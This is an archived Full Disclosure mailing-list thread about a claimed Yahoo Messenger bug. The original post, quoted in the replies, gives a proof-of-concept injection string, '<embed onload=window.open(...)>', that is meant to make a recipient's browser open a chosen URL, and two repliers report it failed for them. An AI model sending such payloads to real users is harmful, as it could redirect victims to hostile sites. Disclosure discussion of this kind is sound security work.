Full Disclosure mailing list archives
Re: Yahoo messenger serious bug
From: evilrabbi <evilrabbi () gmail com>
Date: Fri, 28 Jul 2006 11:22:06 -0500
didnt' work for me either. On 7/28/06, John Dietz <www.whitewolf () gmail com> wrote:
I just tried this in Mesenger 7.0 and it never opened a browser window. I copied the text exactly from here and made sure the space after helomsg was [Alt]+0160 and the most I could get it to do was do a Yahoo Search on the string. Other side sees: s: helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg<?#@@*-%29?@+%23@;?%28msg>: ---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg <?#@@*-%29?@+%23@;?%28msg>: ---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?( Yahoo! Search: No results were found for helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg <?#@@*-%29?@+%23@;?%28msg>: ---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg <?#@@*-%29?@+%23@;?%28msg>: ---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(. There must be some other settings on either mesenger or the computer itself for this to work as you say. Possibly a setting for mesenger to use your default browser for searches in stead of the PM window? Cheers On 7/28/06, Ivan Ivan <ivancool2003 () yahoo com ar> wrote: > > Hi, > I found another vulnerability in yahoo messenger that > if you receive a Private message with this string > > "helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed > onload=window.open('http:\\\\google.com/')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed > > onload=window.open > ('http:\\\\google.com/')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(" > (without quotes) Yahoo messenger open in this case > google.com in the internet explorer of the remote > victim. > > Yahoo messenger bug proof of concept: > > 1. Open messenger and log it. > > 2. Open a yahoo chat third party like yahelite through > Ymsgr protocol and log it with another account. > > 3. Send a Pm to the messenger account with this > string: s: helomsg > > :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed > onload=window.open('http:\\\\google.com/')>helomsg > :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed > > onload=window.open('http:\\\\google.com/')>helomsg > :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?( > > 4. The remote user will open www.google.com (you can > change) > > Note: "helomsg :" this space must be created with > alt+0160 and this "s: " with a space > > > s:[space]helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed > onload=window.open('http:\\\\google.com/')>helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed > > onload=window.open > ('http:\\\\google.com/')>helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?( > > Tested in yahoo messenger 7.0/7.5 > > > Regards. > > > > > > __________________________________________________ > Preguntá. Respondé. Descubrí. > Todo lo que querías saber, y lo que ni imaginabas, > está en Yahoo! Respuestas (Beta). > ¡Probalo ya! > http://www.yahoo.com.ar/respuestas > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- There is intelligence is in having all the answers, but wisdom lies in knowing which of the questions to answer. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
-- -- h0 h0 h0 -- www.nopsled.net
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Yahoo messenger serious bug Ivan Ivan (Jul 28)
- Re: Yahoo messenger serious bug John Dietz (Jul 28)
- Re: Yahoo messenger serious bug evilrabbi (Jul 28)
- Re: Yahoo messenger serious bug Morning Wood (Jul 29)
- Re: Yahoo messenger serious bug John Dietz (Jul 28)